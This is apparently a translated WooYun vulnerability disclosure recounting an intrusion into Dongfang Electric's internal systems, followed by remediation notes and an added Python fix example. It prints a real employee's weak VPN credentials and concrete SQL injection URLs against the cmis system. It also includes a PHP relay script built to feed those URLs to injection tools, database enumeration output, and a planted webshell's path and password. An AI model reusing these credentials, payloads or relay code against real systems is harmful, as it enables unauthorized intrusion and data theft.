Vulnerability summary

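Bug ID: wooyun-2013-043947

Title: A tour through Dongfang Electric's internal network systems

Vendor: dongfang.com

Author: 浩天

Submitted: 2013-11-25 10:02

Fixed: 2014-01-09 10:03

Made public: 2014-01-09 10:03

Vulnerability type: Successful intrusion incident

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]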


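Vulnerability details

Disclosure status:

2013-11-25: Details reported to the vendor, awaiting vendor handling
2013-11-25: Vendor has confirmed; details disclosed only to the vendor
2013-12-05: Details disclosed to core white hats and experts in related fields
2013-12-15: Details disclosed to regular white hats
2013-12-25: Details disclosed to intern white hats
2014-01-09: Details disclosed to the public

Brief description:

A restrained tour of internal systems that stops at proof of concept. For the vulnerabilities submitted, not dumping the database and not uploading a shell does not mean they are not serious.
I submitted 3 before and got only 5 RANK in total, which is very cheap; even if this one is given 20, I will only end up with 4~5 RANK.
Sigh, how can Dongfang Electric count as a small vendor? It has far more people than my company.
Notes: social engineering + Struts vulnerability + RTX login + SQL injection through a relay + VPN, and a tour of various systems

Detailed description:

Contents:
1. Social engineering to obtain a large number of employee accounts, cracking weak passwords
2. VPN login
3. Touring multiple internal systems
4. An unusual SQL injection in one system, workable through a relay
5. Struts vulnerability giving a shell as administrator
6. Summary
1. Social engineering first: there are too many weak passwords, so having an account name is enough. Registering personal accounts with a company mailbox is a frightening thing.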

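Proof of vulnerability:

2. Dongfang Electric's VPN is quite something:
https://vpn.dongfang.com/
One example of an account with a weak password:
Account: zhangxr
Password: 12345678
This has little to do with this lady; plenty of other accounts have weak passwords too, so please forgive her. I did not do anything either, I just took a long walk around, so please forgive me as well.

[Screenshot: A1东方电气.png]


3. Because of the VPN, all the other systems become reachable
a. Dongfang Electric office portal:
http://portal.dongfang.com
RTX login works, the group's organizational structure is visible at a glance, and one could chat cordially with the general manager

[Screenshot: A2东方电气.png]


b. The OA and Mail systems are then all accessible:
OA system:
http://oa.dongfang.com/
Mail system:
http://oamail.dongfang.com

[Screenshot: A3.png]


c. Dongfeng Electric Machinery (东风电机) KOA system:
http://dfdjoa.dongfang.com
d. Integrated management information system:
http://cmis.dongfang.com
4. SQL injection in the cmis system
http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=410065529-ablename=CMIS_QUALITY_CUL_EXP
Injection point: id=
http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=410065529 and 1=1-ablename=CMIS_QUALITY_CUL_EXP
Content is returned
http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=410065529 and 1=2-ablename=CMIS_QUALITY_CUL_EXP
Tools cannot be used on it directly. After some analysis: the parameters are joined with "-" rather than "&", and because "-" collides with the comment marker, it could not be cracked that way and tools would not work either. After some thought I used a relay; the code is as follows:
inj.php file: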
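<?php
// Relay script: takes ?id=... on the local host and forwards it to the
// endpoint, re-attaching the second parameter that the application joins with "-".
set_time_limit(0);
$id=$_GET["id"];
echo $id;
// Percent-encode spaces and "=" so the value survives inside the forwarded URL.
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
$url = "http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=$id-ablename=CMIS_QUALITY_CUL_EXP";
echo $url;
// Fetch the page and return the response body to the caller.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>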
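New injection point:
http://192.168.0.1/inj.php?id=410065529
Then I ran the tool against it; I only enumerated the database names and the structure of the cmis database, and did not dump any data: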
available databases [16]:
[*] CMIS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: CMIS
[230 tables]
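5. Struts vulnerability in the portal system;
This time I did upload a shell. The internal network could have been penetrated further, but I did not do so and stopped here. The severity is shown in the screenshots:
http://portal.dongfang.com/decpro/decsys.jsp password: 123123

[Screenshots: B1.png, B2.png, B3.png, B4.png]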


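Fix:

6. Summary:
a. Enforce password strength for employees; do not use default or weak passwords
b. Generally nobody dares to put a VPN so directly on the outside
c. I don't know what else; actually the internal systems have many other problems, quite a lot
d. Testing stopped at the shell. Please no cross-province pursuit and no invitation to "have tea"; I did nothing, this was a friendly test
e. I am a good person; 剑心 can vouch for that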
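
For the indexNewsContent.svt injection in item 4, one server-side fix is to parse the "-"-joined query string strictly, bind the id, and allow-list the table name. This is an added example, not code from the report or the vendor: Python with an in-memory SQLite table stands in for the real application and database, the `ablename` parameter name is copied as it appears in the URLs above, and the allow-list and sample row are constructed.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed allow-list: tables the news page is permitted to read.
ALLOWED_TABLES = {"CMIS_QUALITY_CUL_EXP", "CMIS_QUALITY_CUL_NEWS"}

# The endpoint joins its two parameters with "-" instead of "&", so generic
# parameter parsing never sees them as separate values. Parse the whole
# query string strictly: ASCII digits, "-", then an upper-case identifier.
QUERY_RE = re.compile(r"id=([0-9]{1,12})-ablename=([A-Z][A-Z0-9_]{0,39})")


def parse_query(raw_query: str) -> tuple:
    """Return (news_id, table) or raise ValueError for anything unexpected."""
    match = QUERY_RE.fullmatch(unquote(raw_query))
    if match is None:
        raise ValueError("malformed query string")
    table = match.group(2)
    if table not in ALLOWED_TABLES:
        raise ValueError("table not permitted")
    return int(match.group(1)), table


def fetch_news(conn: sqlite3.Connection, raw_query: str):
    """Look up one news row; the id is bound, never concatenated."""
    news_id, table = parse_query(raw_query)
    # Table names cannot be bound parameters, so only an allow-listed
    # constant ever reaches the SQL text.
    sql = f"SELECT title FROM {table} WHERE id = ?"
    return conn.execute(sql, (news_id,)).fetchone()


def demo() -> dict:
    """Run three request shapes against a toy table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CMIS_QUALITY_CUL_EXP (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO CMIS_QUALITY_CUL_EXP VALUES (410065529, 'sample')")
    requests = {
        "normal": "id=410065529-ablename=CMIS_QUALITY_CUL_EXP",
        "and 1=1": "id=410065529%20and%201%3D1-ablename=CMIS_QUALITY_CUL_EXP",
        "other table": "id=410065529-ablename=TS_USER",
    }
    results = {}
    for label, query in requests.items():
        try:
            results[label] = fetch_news(conn, query)
        except ValueError as exc:
            results[label] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(label, "->", outcome)
```
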

Copyright notice: when reposting, please credit the source 浩天@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-11-25 12:52

Vendor reply:

Thank you for notifying us

Latest status:

None yet